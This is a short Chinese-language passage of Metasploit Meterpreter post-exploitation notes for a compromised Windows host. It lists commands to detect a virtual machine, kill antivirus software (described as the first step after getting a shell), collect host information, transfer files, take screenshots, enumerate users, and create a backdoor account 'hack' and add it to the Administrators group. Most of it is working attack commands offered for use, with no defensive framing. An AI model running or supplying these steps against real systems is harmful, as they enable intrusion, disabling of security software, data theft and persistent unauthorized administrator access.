查看主机是否运行在虚拟机上

run post/windows/gather/checkvm

关闭杀毒软件
拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件，通过命令

run killav

获取目标主机的详细信息

run scraper

它将目标机器上的常见信息收集起来然后下载保存在本地

Meterpreter支持非常多的文件系统命令（基本跟Linux系统命令类似），一些常用命令如下：

pwd：当前所在位置
ls：获取当前目录下的文件
cd：切换目标目录；
cat：读取文件内容；
rm：删除文件；
edit：使用vim编辑文件
mkdir：新建目录；
rmdir：删除目录；所在位置

upload file 命令则能够向目标系统上传文件。

download file 命令可以帮助我们从目标系统中下载文件

屏幕截图

screenshot 

截图目标主机屏幕，可以看到，图片被保存到了/root 目录下


查看目标主机有哪些用户

run post/windows/gather/enum_logged_on_users

可以在目标系统中创建一个新的用户账号

run getgui -u hack -p qwe

这个命令会创建用户，并把他添加到 Administrators 组中，这样该用户就拥有远程桌面的权限了。这里成功创建了用户，但是添加到Administrators组中失败了 !
如果添加到Administrators组中失败了的话，我们可以运行：shell,进行cmd窗口手动将该用户添加到administrators组中。

查看系统用户组

net localgroup 

administrators即为系统管理员用户组，只需要将添加的用户加入到管理员用户组即可。

将hack用户添加到管理员用户组。

net localgroup administrators hack /add